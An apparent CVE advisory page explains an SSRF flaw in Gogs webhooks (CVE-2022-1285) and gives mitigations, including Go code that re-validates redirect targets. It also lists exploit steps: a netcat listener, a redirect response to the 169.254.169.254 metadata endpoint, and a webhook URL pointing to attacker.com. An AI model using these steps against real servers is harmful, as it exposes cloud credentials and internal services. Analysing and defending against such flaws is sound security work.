How CVE-2022-1285 Works
Gogs is a self-hosted Git service that allows repository administrators to configure webhooks, which trigger HTTP requests to external URLs upon specific events. CVE-2022-1285 is a Server-Side Request Forgery (SSRF) vulnerability that exists in Gogs versions prior to 0.12.8. The root cause lies in how the webhook functionality handles HTTP redirects.
The vulnerability is a Time-of-Check to Time-of-Use (TOCTOU) issue. When a webhook URL is initially created or tested, Gogs validates that its hostname does not resolve to a local or private IP address (e.g., 127.0.0.1, 192.168.0.0/16). However, at the time of the actual webhook delivery, Gogs performs a new DNS lookup and does not re-validate the resolved IP address. This allows an attacker to bypass the initial validation.
An attacker can exploit this by creating a webhook with a URL that resolves to an external server they control. This server is configured to respond with an HTTP redirect status code (e.g., `301 Moved Permanently` or `308 Permanent Redirect`) pointing to an internal or sensitive resource such as a cloud metadata service (`http://169.254.169.254/metadata/v1.json`). When Gogs follows this redirect, it sends the request to the internal IP address, effectively allowing the attacker to probe and access internal services. This is particularly dangerous on cloud platforms (AWS, GCP, DigitalOcean) where metadata endpoints can expose sensitive information such as access keys. The vulnerability affects all Gogs installations that accept public traffic.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Gogs
Version: < 0.12.8
Vulnerability: SSRF
Severity: Medium
Date: 2022-06-01
<h2 style="color: blue;">Prediction: 2022-06-01 (Patched)</h2>
<h2 style="color: blue;">What Undercode Say</h2>
The following is the technical analysis and commands related to this CVE.
<h2 style="color: blue;">Analytics:</h2>
<h2 style="color: blue;">Vulnerability Type: Server-Side Request Forgery (SSRF)</h2>
<h2 style="color: blue;">Attack Vector: Malicious HTTP redirects in webhook URLs</h2>
<h2 style="color: blue;">Bypass Technique: Time-of-Check to Time-of-Use (TOCTOU)</h2>
Target Endpoint:
Exploit Prerequisite: Ability to create a webhook
Affected Functionality: Webhook delivery mechanism
Root Cause: Lack of re-validation on redirect
Patch Version: v0.12.8
Fix Commit: `7885f454a4946c4bbec1b4f8c603b5eea7429c7f`
Security Advisory: GHSA-c4v7-xg93-qf8g
Commands:
Start a netcat listener to act as the malicious redirector:
`nc -l -p 8080`
Once a connection is received, send the following HTTP response to trigger the SSRF:
`HTTP/1.1 301 Moved Permanently`
`Location: http://169.254.169.254/metadata/v1.json`
`Content-Length: 0`
`Connection: close`
How the Exploit Works:
- The attacker sets up a server under their control that listens for incoming HTTP requests.
- In the Gogs repository settings, the attacker creates a new webhook and sets its “Payload URL” to the attacker’s server (e.g., `http://attacker.com:8080`).
- The attacker tests the webhook or triggers an event that causes Gogs to send a request to the webhook URL.
- Gogs connects to the attacker’s server, which responds with a `301` or `308` redirect to an internal address like `http://169.254.169.254/metadata/v1.json`.
- Gogs follows the redirect and sends a request to the internal metadata service.
- The response from the internal service is returned to the attacker, potentially exposing sensitive information.
Protection:
Upgrade Gogs: The primary and most effective protection is to upgrade to Gogs version `0.12.8` or later.
Implement Redirect Validation: Apply the official fix which leverages `Client.CheckRedirect` to re-validate the resolved IP address of any redirect target before following it.
Network Segmentation: Restrict outbound HTTP/S traffic from the Gogs server to private IP ranges and cloud metadata endpoints.
Webhook URL Allowlisting: Implement an allowlist of permitted webhook destinations so that connections to any other host, external or internal, are refused.
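The re-validation described under Protection (and the TOCTOU gap described above), shown as an added Go example written for this page, not Gogs' own code: a webhook HTTP client whose `CheckRedirect` re-resolves every redirect target and whose dialer `Control` hook checks the address actually being connected to, so neither a 301/308 redirect nor a changed DNS answer at delivery time can reach a loopback, private or link-local address. The function names are assumptions.

```go
package main

import (
	"errors"
	"net"
	"net/http"
	"syscall"
)

// isDisallowedIP: loopback, RFC 1918 and link-local (which holds 169.254.169.254).
func isDisallowedIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()
}

// validateHost resolves a name or IP literal and rejects it if any address is
// disallowed; vulnerable Gogs ran this check only when the webhook was saved.
func validateHost(host string) error {
	ips, err := net.LookupIP(host)
	if err != nil {
		return err
	}
	for _, ip := range ips {
		if isDisallowedIP(ip) {
			return errors.New("webhook target " + host + " resolves to disallowed " + ip.String())
		}
	}
	return nil
}

// checkRedirect re-validates each redirect target, so a 301/308 cannot steer delivery inward.
func checkRedirect(req *http.Request, via []*http.Request) error {
	if len(via) >= 3 {
		return errors.New("stopped after 3 redirects")
	}
	return validateHost(req.URL.Hostname())
}

// dialControl checks the address actually chosen just before connect(2), closing
// the DNS-rebinding window between validation and use that CheckRedirect leaves.
func dialControl(_, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	return validateHost(host) // host is an IP literal here, so no DNS query is made
}

// newWebhookClient wires both hooks into the client used for deliveries.
func newWebhookClient() *http.Client {
	d := &net.Dialer{Control: dialControl}
	return &http.Client{CheckRedirect: checkRedirect, Transport: &http.Transport{DialContext: d.DialContext}}
}
```

Deliveries made with `newWebhookClient()` fail with an error instead of reaching the metadata service when an attacker-controlled host redirects there.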
Impact:
Information Disclosure: An attacker can read sensitive data from internal services, including cloud metadata endpoints (which may contain API keys, SSH keys, and other credentials), internal configuration management systems, and other internal APIs.
Internal Network Scanning: The vulnerability can be used to port-scan internal network hosts and discover other services.
Privilege Escalation: By obtaining cloud credentials, an attacker could potentially gain elevated access to the underlying cloud infrastructure.
Sources:
Reported By: github.com